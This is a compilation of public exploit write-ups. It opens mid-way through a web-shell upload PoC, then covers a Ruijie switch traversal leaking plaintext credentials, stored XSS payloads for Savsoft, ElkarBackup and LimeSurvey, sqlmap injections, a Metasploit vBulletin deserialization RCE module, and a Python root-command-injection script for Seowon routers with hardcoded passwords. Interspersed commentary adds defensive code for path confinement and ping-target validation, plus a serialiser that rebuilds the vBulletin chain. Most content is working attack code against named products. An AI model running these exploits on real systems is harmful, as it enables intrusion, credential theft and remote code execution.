    "\x3c/form\x3e\r\n" +
    "\x3c/body\x3e\r\n" +
    "\x3c/html\x3e\r\n" +
    "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" +
    "Content-Disposition: form-data; name=\"action\"\r\n" +
    "\r\n" +
    "upload\r\n" +
    "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" +
    "Content-Disposition: form-data; name=\"responderId\"\r\n" +
    "\r\n" +
    "ResourceNewResponder\r\n" +
    "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" +
    "Content-Disposition: form-data; name=\"remotePath\"\r\n" +
    "\r\n" +
    "/opt/resources\r\n" +
    "------WebKitFormBoundaryhbcZX7o0Hw19h3kr--\r\n";
  // send as raw bytes so the browser does not re-encode the body
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
  <input type="button" value="Click" onclick="uploadShellPoC();" />
</form>
</body>
</html>

<!--
JSON response for successful upload:

{ "first": true, "second": [ "cmd.aspx" ] }

GET request: http://192.168.1.74:8090/opt/resources/cmd.aspx

Command issued: /c whoami
Response: robertovolare\administrator
-->
-
Ruijie Networks Switch eWeb S29_RGOS 11.4 - Directory Traversal
# Exploit Title: Ruijie Networks Switch eWeb S29_RGOS 11.4 - Directory Traversal
# Exploit Author: Tuygun
# Date: 2020-08-19
# Vendor Homepage: https://www.ruijienetworks.com/
# Version: eWeb S29_RGOS 11.4(1)B12P11
# Source : https://faruktuygun.com/directorytraversal.html

Proof of Concept

Request:

GET /download.do?file=../../../../config.text HTTP/1.1
Host: 192.168.2.160
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: LOCAL_LANG_COOKIE=en; UI_LOCAL_COOKIE=en; mac=0074.9c95.43f0; SID=33BA8206DE5B8B8295C89A3C4787D7A; module=network; subModule=certify; threeModule=certify_adv
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Date: Wed, 03 Jun 2020 20:52.25 GMT
Server: HTTP-Server/1.1
Content-length: 2070
Content-Disposition: attachment; filename="config.text"
Content-Type: application/octet-stream; Charset=UTF-8

version S29_RGOS 11.4(1)B12P11
hostname OMURGA
!
no spanning-tree
!
username admin password admin
username ruijie privilege 15 201998
!
cwmp
!
install 0 S2910C-24GT2XS-HP-E
!
sysmac 0074.9C95.43f0
!
enable service web-server http
enable service web-server https
webmaster level 1 username ruijie password 201998
!
nfpp
!
.
.
.

Note that the PoC request carries a SID session cookie; the advisory does not state whether download.do serves the file without a valid session. The returned running configuration contains the web and CLI credentials in the clear, so a traversal to config.text is equivalent to a credential disclosure.
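Both the Ruijie download.do traversal above and the QiHang QH.aspx fileName and remotePath handling earlier on this page share one root cause: a user-supplied path is joined onto a base directory and used without checking where the result lands. The following is an added example, not code from either vendor: a naive join that reproduces the escape next to a resolver that decodes one layer of URL encoding, rejects absolute paths and drive letters, canonicalises, and then confines the result to the base directory. The base directory name is an assumption; none of the paths need to exist.

```python
import os
from urllib.parse import unquote


def naive_join(base_dir, user_path):
    """The vulnerable pattern: join and normalise, trust the result.
    '../../../../config.text' walks straight out of base_dir."""
    return os.path.normpath(os.path.join(base_dir, unquote(user_path)))


def resolve_under(base_dir, user_path):
    """Return the canonical absolute path of user_path inside base_dir, or
    None when the request would escape it.

    Decodes one layer of percent-encoding first, because values such as
    '.%2fWeb.config' or '..%2f..%2fconfig.text' reach the handler decoded.
    Absolute paths and Windows drive letters are rejected outright: for those
    os.path.join discards base_dir entirely, so no later check would help."""
    decoded = unquote(user_path)
    if os.path.isabs(decoded) or (len(decoded) > 1 and decoded[1] == ":"):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, decoded))
    # Prefix check on base + separator so '/srv/qh-webx' is not accepted as inside '/srv/qh-web'
    if candidate == base or candidate.startswith(base + os.sep):
        return candidate
    return None


# Assumed web root for the demonstration.
BASE = "/srv/qh-web"

if __name__ == "__main__":
    for p in (".%2fWeb.config", "../../../../config.text", "..%2f..%2fconfig.text",
              "/etc/passwd", "C:\\Windows\\win.ini", "opt/../../escape", "qh-web/../x"):
        print("%-28s naive=%-28s safe=%s" % (p, naive_join(BASE, p), resolve_under(BASE, p)))
```

On a Windows host os.path handles backslashes as separators, so the same function covers '..\\..\\web.config'; on a POSIX host a backslash is an ordinary filename character and is simply confined like any other name.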
-
Savsoft Quiz 5 - Stored Cross-Site Scripting
# Exploit Title: Savsoft Quiz 5 - Stored Cross-Site Scripting
# Date: 2020-07-28
# Exploit Author: Mayur Parmar(th3cyb3rc0p)
# Vendor Homepage: https://savsoftquiz.com/
# Software Link: https://github.com/savsofts/savsoftquiz_v5.git
# Version: 5.0
# Tested on: Windows 10
# Contact: https://www.linkedin.com/in/th3cyb3rc0p/
# CVE: CVE-2020-24609

Stored Cross-site scripting (XSS):
Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, a message forum, a visitor log, a comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent XSS.

Attack vector:
This vulnerability allows an attacker to inject an XSS payload in the User Registration section; each time an admin visits the Manage Users section of the admin panel, the XSS triggers and the attacker can steal the admin's cookie, depending on the crafted payload.

Vulnerable Parameters: First Name, Last Name

Steps to reproduce:
1. Go to the registration page.
2. Fill in the details and put the <script>alert("XSS")</script> payload in First Name and Last Name.
3. Now go to the Admin Panel; the payload is executed.

POST /index.php/login/insert_user/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 255
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php/login/registration/
Cookie: ci_session=d99b121b1213b92a163181fd49c75f667dbce9ea
Upgrade-Insecure-Requests: 1

email=hack3r%40gmail.com&password=Hacker%40gmail.com&first_name=%3Cscript%3Ealert%28%22XSS+0%22%29%3B%3C%2Fscript%3E&last_name=%3Cscript%3Ealert%28%22XSS+2%22%29%3B%3C%2Fscript%3E&contact_no=9876543210&gid%5B%5D=1
-
Pharmacy Medical Store and Sale Point 1.0 - 'catid' SQL Injection
# Title: Pharmacy Medical Store and Sale Point 1.0 - 'catid' SQL Injection
# Exploit Author: Moaaz Taha (0xStorm)
# Date: 2020-08-18
# Vendor Homepage: https://www.sourcecodester.com/php/14398/pharmacymedical-store-sale-point-using-phpmysql-bootstrap-framework.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14398&title=Pharmacy%2FMedical+Store+%26+Sale+Point+Using+PHP%2FMySQL+with+Bootstrap+Framework
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4

# Description
The "catID" parameter of "/medical/inventeries.php?catID=1" is vulnerable to time-based blind SQL injection, which allows all databases to be retrieved.

# POC
sqlmap -u "http://TARGET/medical/inventeries.php?catID=1" -p catID --dbms=mysql --threads=10
-
ElkarBackup 1.3.3 - Persistent Cross-Site Scripting
# Exploit Title: ElkarBackup 1.3.3 - Persistent Cross-Site Scripting
# Date: 2020-08-14
# Exploit Author: Enes Özeser
# Vendor Homepage: https://www.elkarbackup.org/
# Version: 1.3.3
# Tested on: Linux

1- Go to the following URL. >> http://(HOST)/elkarbackup/login
2- The default username and password is root:root. We must know login credentials.
3- Go to "Jobs" and press the "Add client" button.
4- Write the XSS payload in the "Name" field.
5- Press the "Save" button.

(( Executable XSS Payloads ))

1- "><script>alert('XSS Confirmed!');</script>
2- "><script>alert("XSS Confirmed!");</script>
3- "><script>alert(document.cookie);</script>
4- "><script>alert(document.domain);</script>

(( REQUEST ))

POST /elkarbackup/client/2 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://(HOST)/elkarbackup/client/2
Content-Type: application/x-www-form-urlencoded
Content-Length: 358
Connection: close
Cookie: PHPSESSID=dop3m1qj8c5octaxuasd21as2
Upgrade-Insecure-Requests: 1

Client%5Bname%5D=%22%3E%3Cscript%3Ealert%28%22XSS+Confirmed%21%22%29%3C%2Fscript%3E&Client%5Burl%5D=&Client%5Bquota%5D=-1&Client%5Bdescription%5D=&Client%5BisActive%5D=1&Client%5BmaxParallelJobs%5D=1&Client%5Bowner%5D=1&Client%5BsshArgs%5D=&Client%5BrsyncShortArgs%5D=&Client%5BrsyncLongArgs%5D=&Client%5B_token%5D=yrL8pXqx-sTVYhLQBpL523I-BOnSqoRyZnd5MUt2bfI
-
PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)
# Exploit Title: PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)
# Google Dork: -
# Date: 2020-08-17
# Exploit Author: İsmail ERKEK
# Vendor Homepage: http://wiki.pnpscada.com/forumHome.jsp
# Version: 2.200816204020
# Tested on: -

1. Description:
----------------------
PNPSCADA 2.200816204020 allows SQL Injection via the 'interf' parameter in /browse.jsp. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

2. Proof of Concept:
----------------------
In Burp Suite, intercept the request from one of the affected pages with the 'interf' parameter and save it as req-pnp-browse.txt. Then run sqlmap to extract the data from the database:

sqlmap -r req-pnp-browse.txt --risk=3 --level=5 --dbs --random-agent

3. Example payload:
----------------------
(time-based blind, PostgreSQL)

memh=803509994960085058&searchStr=&replaceId=k1&multiple=yes&interf=115 AND 6380=(SELECT 6380 FROM PG_SLEEP(5))&page=1&mselect=98831

4. Burp Suite request:
----------------------
POST /browse.jsp HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://127.0.0.1/browse.jsp?memh=2510775194362297745&interf=115&replaceId=k1&multiple=yes
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Cookie: wiki=; psl=7465737433; JSESSIONID=1ojrclvd94cpfebapnqebli37

memh=803509994960085058&searchStr=*&replaceId=k1&multiple=yes&interf=115*&page=1&mselect=98831
-
vBulletin 5.1.2 < 5.1.9 - Unserialize Code Execution (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'vBulletin 5.1.2 Unserialize Code Execution',
      'Description'    => %q{
        This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9
      },
      'Platform'       => 'php',
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Netanel Rubin', # reported by
          'cutz', # original exploit
          'Julien (jvoisin) Voisin', # metasploit module
        ],
      'Payload'        =>
        {
          'BadChars' => "\x22",
        },
      'References'     =>
        [
          ['CVE', '2015-7808'],
          ['EDB', '38629'],
          ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'],
          ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
        ],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Automatic Targeting', { 'auto' => true } ],
          ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],
          ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],
        ],
      'DisclosureDate' => 'Nov 4 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
      ])
  end

  def check
    begin
      res = send_request_cgi({ 'uri' => target_uri.path })
      if (res && res.body.include?('vBulletin Solutions, Inc.'))
        if res.body.include?("Version 5.0")
          @my_target = targets[1] if target['auto']
          return Exploit::CheckCode::Appears
        elsif res.body.include?("Version 5.1")
          @my_target = targets[2] if target['auto']
          return Exploit::CheckCode::Appears
        else
          return Exploit::CheckCode::Detected
        end
      end
      # No vBulletin banner in the response: the original fell through and returned nil here
      return Exploit::CheckCode::Safe
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_status("Trying to fingerprint the instance...")
    @my_target = target
    check_code = check
    unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
      fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable instance")
    end

    if @my_target.nil? || @my_target['auto']
      fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
    end

    print_status("Exploiting #{@my_target.name}...")

    # Serialized vB_dB_Result whose protected $db is a database object with
    # free_result mapped to assert(), and whose protected $recordset is the PHP payload.
    # PHP names protected properties "\0*\0db", so the string length is 5, not 2;
    # the bare '*' written here is turned into "\0*\0" after URI encoding below.
    chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:'
    chain << @my_target["chain"].length.to_s
    chain << ':"'
    chain << @my_target["chain"]
    chain << '":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"assert";}}s:12:"*recordset";s:'
    chain << "#{payload.encoded.length}:\"#{payload.encoded}\";}"
    chain = Rex::Text.uri_encode(chain)
    chain = chain.gsub(/%2a/, '%00%2a%00') # php and Rex disagree on '*' encoding

    send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'),
      'vars_get' => { 'arguments' => chain },
      'encode_params' => false,
    })
  end
end
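The chain the module builds looks odd at first glance: `s:5:"*db"` declares a five-byte string for a three-character name. That is PHP's property-name mangling, in which a protected property serialises as "\0*\0name" and a private one as "\0Class\0name", with the NUL bytes counted in the length. The following is an added example, not part of the Metasploit module: a minimal PHP serialiser in Python that handles that mangling and reproduces the module's chain byte for byte, so the length prefixes can be checked against what PHP's unserialize() expects. Class and property names come from the module above; the PHP payload string is a placeholder.

```python
from urllib.parse import quote


class PhpObject:
    """A PHP object to serialize: class name plus (name, visibility, value) triples."""

    def __init__(self, class_name, props):
        self.class_name = class_name
        self.props = props


def php_prop_key(name, visibility, class_name):
    # PHP mangles non-public property names with NUL bytes; the NULs count
    # toward the serialized string length, which is why "*db" is length 5.
    if visibility == "public":
        return name
    if visibility == "protected":
        return "\x00*\x00" + name
    if visibility == "private":
        return "\x00" + class_name + "\x00" + name
    raise ValueError("unknown visibility %r" % visibility)


def php_serialize(value):
    """Serialize bool, int, str, dict (PHP array) and PhpObject like PHP's serialize()."""
    if isinstance(value, bool):
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        # Length is in bytes and nothing is escaped: the length prefix is what
        # lets quotes, semicolons and braces appear inside the string.
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, PhpObject):
        body = "".join(
            php_serialize(php_prop_key(name, vis, value.class_name)) + php_serialize(v)
            for name, vis, v in value.props)
        return 'O:%d:"%s":%d:{%s}' % (len(value.class_name), value.class_name,
                                      len(value.props), body)
    raise TypeError("cannot serialize %r" % type(value))


def build_vbulletin_chain(db_class, php_code):
    """vB_dB_Result whose protected $db is a database object with free_result
    mapped to assert(), and whose protected $recordset holds the PHP to run.
    db_class is 'vB_Database' (5.0.x) or 'vB_Database_MySQLi' (5.1.x)."""
    db = PhpObject(db_class, [("functions", "public", {"free_result": "assert"})])
    result = PhpObject("vB_dB_Result", [("db", "protected", db),
                                        ("recordset", "protected", php_code)])
    return php_serialize(result)


def to_query_value(chain):
    # The NUL bytes become %00 and '*' becomes %2A, which is the "%00%2a%00"
    # the module patches in after Rex has encoded the bare '*'.
    return quote(chain, safe="")


if __name__ == "__main__":
    chain = build_vbulletin_chain("vB_Database", "phpinfo();")  # placeholder payload
    print(repr(chain))
    print(to_query_value(chain))
```

The same serialiser shows why the module sets `"\x22"` as a bad character: the payload is embedded inside a double-quoted serialized string, and while PHP itself only trusts the length prefix, the surrounding URI handling and the module's own string building would still be disturbed by an unescaped quote.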
-
Seowon SlC 130 Router - Remote Code Execution
# Exploit Title: Seowon SlC 130 Router - Remote Code Execution
# Author: maj0rmil4d - Ali Jalalat
# Author website: https://secureguy.ir
# Date: 2020-08-20
# Vendor Homepage: seowonintech.co.kr
# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kind=B05&middle_kind=B05_29
# CVE: CVE-2020-17456
# Version: Lync:Mac firmware 1.0.1, likely earlier versions
# Tested on: Windows 10 - Parrot sec
# Description:
# A user can run arbitrary commands on the router as root!
# There are also hardcoded credentials, so the exploit is easy to trigger.
# credentials :
# user => VIP
# pwd  => V!P83869000
# user => Root
# pwd  => PWDd0N~WH*4G#DN
# user => root
# pwd  => gksrmf28
# user => admin
# pwd  => admin
#
# A write-up can be found at:
# https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/

import sys
import requests

if len(sys.argv) != 3:
    print("usage: %s http://<router> '<command>'" % sys.argv[0])
    sys.exit(1)

host = sys.argv[1]
cmd = sys.argv[2]
session = requests.Session()
# Content-Length is left to requests; a hardcoded value does not match the real body
header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "http://192.168.1.1",
    "Connection": "close",
    "Referer": "http://192.168.1.1/",
    "Upgrade-Insecure-Requests": "1"
}
datas = {
    "Command": "Submit",
    "expires": "Wed%2C+12+Aug+2020+15%3A20%3A05+GMT",
    "browserTime": "081119502020",
    "currentTime": "1597159205",
    "user": "admin",
    "password": "admin"
}

# auth
session.post(host + "/cgi-bin/login.cgi", headers=header, data=datas)

# rce: the ping target is handed to a shell unquoted, so ";<cmd>" runs <cmd> as root
rce_data = {
    "Command": "Diagnostic",
    "traceMode": "ping",
    "reportIpOnly": "",
    "pingIpAddr": ";" + cmd,
    "pingPktSize": "56",
    "pingTimeout": "30",
    "pingCount": "4",
    "maxTTLCnt": "30",
    "queriesCnt": "3",
    "reportIpOnlyCheckbox": "on",
    "btnApply": "Apply",
    "T": "1597160664082"
}
rce = session.post(host + "/cgi-bin/system_log.cgi", headers=header, data=rce_data)

# the first line of command output sits inside the ping result block of the page
try:
    print("one line output of your command => " + rce.text.split('!')[1].split('[')[2].split("\n")[0])
except IndexError:
    print("could not locate command output in the response; raw body follows:\n" + rce.text)
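The Seowon bug above is a textbook shell injection: the pingIpAddr value is interpolated into a ping command line, so ";id" becomes a second command. The following is an added example, not from the router firmware or the exploit: the target validation and argument-list execution a diagnostic handler should use instead, with the vulnerable string-building shown alongside for contrast. The ping flags are the Linux iputils ones (an assumption about the host running it); only the helpers that build and validate the command are exercised, the actual ping is behind run_ping().

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: labels of 1-63 alphanumerics or hyphens, no leading or
# trailing hyphen, 253 characters overall.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")


def vulnerable_cmdline(target):
    """The pattern behind the advisory: user input pasted into a shell string.
    Shown only to make the contrast visible; never execute this."""
    return "ping -c 4 %s" % target


def valid_ping_target(value):
    """Accept an IPv4/IPv6 literal or a DNS hostname, nothing else.
    Shell metacharacters (';', '|', '$(', backticks, spaces) and a leading '-'
    (which would be parsed by ping as an option) all fail both checks."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return bool(_HOSTNAME.match(value))


def ping_argv(target, count=4, timeout=30):
    """Build the argument vector; int() on the numeric fields rejects anything
    that is not a number, so they cannot smuggle extra arguments either."""
    if not valid_ping_target(target):
        raise ValueError("invalid ping target: %r" % target)
    return ["ping", "-c", str(int(count)), "-W", str(int(timeout)), "--", target]


def run_ping(target, count=4, timeout=30):
    # argv list with shell=False: no shell ever sees the value, so even a
    # metacharacter that slipped past validation would be an ordinary argument.
    return subprocess.run(ping_argv(target, count, timeout),
                          capture_output=True, text=True, check=False)


if __name__ == "__main__":
    for t in ("192.168.1.1", "router.lan", ";id", "8.8.8.8;reboot", "$(id)", "-h"):
        print("%-16s valid=%-5s shell would run: %s" % (t, valid_ping_target(t), vulnerable_cmdline(t)))
```

Validation and argv-style execution are both needed: validation keeps ping from receiving option-looking arguments, and argv execution means a future change to the allowed inputs cannot reintroduce a shell.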
-
Complaint Management System 1.0 - 'cid' SQL Injection
# Title: Complaint Management System 1.0 - 'cid' SQL Injection
# Exploit Author: Mohamed Elobeid (0b3!d)
# Date: 2020-08-21
# Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14206&title=Complaint+Management+System
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4

# Description
The "cid" parameter of "/Complaint%20Management%20System/admin/complaint-details.php?cid=60" is vulnerable to error-based SQL injection, which allows all databases to be retrieved. The page is behind the admin login, so a valid PHPSESSID is required.

# POC
sqlmap -u 'http://target/Complaint Management System/admin/complaint-details.php?cid=60' --cookie="PHPSESSID=bb4g25d3qceicepo7b3d26cfpp" --dbms=mysql --dbs
-
LimeSurvey 4.3.10 - 'Survey Menu' Persistent Cross-Site Scripting
# Exploit Title: LimeSurvey 4.3.10 - 'Survey Menu' Persistent Cross-Site Scripting
# Date: 2020-08-23
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.limesurvey.org
# Version: LimeSurvey 4.3.10+200812
# Tested on: Ubuntu 18.04.4
# Patch Link: https://github.com/LimeSurvey/LimeSurvey/commit/3712854a8fd8d875c67640969a1d54c4d93d3676

# Vulnerability Details
Description : A stored cross-site scripting vulnerability exists within the "Survey Menu" functionality of the LimeSurvey administration panel.
Vulnerable Parameters : Surveymenu[parent_id] (the payload is stored through Surveymenu[title] and rendered when a second menu references that menu as its parent)

# POC

# Request 1 : Create a survey menu with the Surveymenu[title] parameter set to an XSS payload.

POST /limesurvey/index.php/admin/menus/sa/update/id/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 524
Origin: http://TARGET
Connection: close
Referer: http://TARGET/limesurvey/index.php/admin/menus/sa/view
Cookie: LS-MRZROBQAFECYWCMT=v1ac49ivhs7bb5ocb8sqc7oq51; YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D

YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D&Surveymenu%5Bparent_id%5D=&Surveymenu%5Bsurvey_id%5D=&Surveymenu%5Buser_id%5D=&Surveymenu%5Bordering%5D=0&Surveymenu%5Bshowincollapse%5D=0&Surveymenu%5Bname%5D=realmenu&Surveymenu%5Btitle%5D=%3Csvg%2Fonload%3Dalert(1)%3E&Surveymenu%5Bdescription%5D=XSS+Test&Surveymenu%5Bposition%5D=side&Surveymenu%5Bchanged_by%5D=1&Surveymenu%5Bchanged_at%5D=2020-08-15+20%3A40%3A10&Surveymenu%5Bcreated_by%5D=1&Surveymenu%5Bid%5D=

# Request 2 : Create a second survey menu with the Surveymenu[parent_id] parameter set to the id of the menu created by the previous request. The XSS payload is triggered by this survey menu.

POST /limesurvey/index.php/admin/menus/sa/update/id/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 505
Origin: http://TARGET
Connection: close
Referer: http://TARGET/limesurvey/index.php/admin/menus/sa/view
Cookie: LS-MRZROBQAFECYWCMT=v1ac49ivhs7bb5ocb8sqc7oq51; YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D

YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D&Surveymenu%5Bparent_id%5D=11&Surveymenu%5Bsurvey_id%5D=&Surveymenu%5Buser_id%5D=5&Surveymenu%5Bordering%5D=1&Surveymenu%5Bshowincollapse%5D=0&Surveymenu%5Bname%5D=xssmenu&Surveymenu%5Btitle%5D=XSS+Test&Surveymenu%5Bdescription%5D=XSS+Test&Surveymenu%5Bposition%5D=side&Surveymenu%5Bchanged_by%5D=1&Surveymenu%5Bchanged_at%5D=2020-08-15+20%3A42%3A58&Surveymenu%5Bcreated_by%5D=1&Surveymenu%5Bid%5D=